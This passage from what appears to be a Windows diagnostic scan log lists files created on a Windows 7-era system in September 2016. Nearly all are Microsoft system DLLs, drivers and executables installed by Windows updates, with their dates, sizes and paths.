    2016-09-14 01:10 - 2016-08-31 19:26 - 02131456 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 19:15 - 15411712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 19:10 - 02921472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2016-09-14 01:10 - 2016-08-31 18:58 - 01550848 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 18:47 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-12 12:26 - 00464896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00405504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
    2016-09-14 01:09 - 2016-09-02 11:40 - 00631176 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 05548264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:35 - 00706280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 00154856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
    2016-09-14 01:09 - 2016-09-02 11:35 - 00095464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
    2016-09-14 01:09 - 2016-09-02 11:34 - 01732864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00503808 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00215552 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01464320 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01212928 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01163264 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00880640 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00730624 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\system32\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00463872 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00419840 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00312320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidsvc.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:21 - 04000488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntkrnlpa.exe
    2016-09-14 01:09 - 2016-09-02 11:21 - 03944680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:18 - 01314112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 01114112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00666112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00553472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:02 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidpolicyconverter.exe
    2016-09-14 01:09 - 2016-09-02 11:02 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
    2016-09-14 01:09 - 2016-09-02 11:02 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidcertstorecheck.exe
    2016-09-14 01:09 - 2016-09-02 11:01 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:58 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\conhost.exe
    2016-09-14 01:09 - 2016-09-02 10:57 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rstrui.exe
    2016-09-14 01:09 - 2016-09-02 10:55 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00291328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
    2016-09-14 01:09 - 2016-09-02 10:53 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\smss.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
    2016-09-14 01:09 - 2016-09-02 10:48 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-08-16 13:36 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:48 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:35 - 03218432 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2016-09-14 01:09 - 2016-08-06 11:31 - 00877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
    2016-09-14 01:09 - 2016-08-06 11:15 - 00581632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
    2016-09-14 01:09 - 2016-07-07 11:36 - 01896168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00377576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00287976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
    2016-09-14 01:09 - 2016-07-07 11:08 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpipreg.sys
    2016-09-14 01:09 - 2016-07-01 11:31 - 00976896 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:31 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\system32\INETRES.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00741888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\INETRES.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 01483264 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00190976 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptnet.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 01176064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00179200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptnet.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 03156480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00098816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 18:07 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
    2016-09-14 01:09 - 2016-05-13 17:55 - 02607104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
    2016-09-14 01:09 - 2016-05-13 17:50 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:38 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
    2016-09-14 01:09 - 2016-05-12 13:14 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
    2016-09-14 01:09 - 2016-05-04 13:21 - 00114408 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
    2016-09-14 01:09 - 2016-05-04 13:17 - 03244032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 02365440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 01806848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 01941504 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 00070144 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
    2016-09-14 01:09 - 2016-05-04 11:04 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
    2016-09-14 01:09 - 2016-05-04 10:55 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
    2016-09-13 21:45 - 2016-09-13 21:48 - 00000000 ____D C:\aa Samsung Master accum
    2016-09-13 01:39 - 2016-07-08 11:32 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
    2016-09-13 01:39 - 2016-07-08 11:16 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
    2016-09-12 21:48 - 2016-06-25 20:35 - 00041704 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
    2016-09-12 21:48 - 2016-06-25 20:27 - 01208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00756736 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00344576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetpp.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetppui.dll
    2016-09-12 21:48 - 2016-06-25 15:54 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32spl.dll
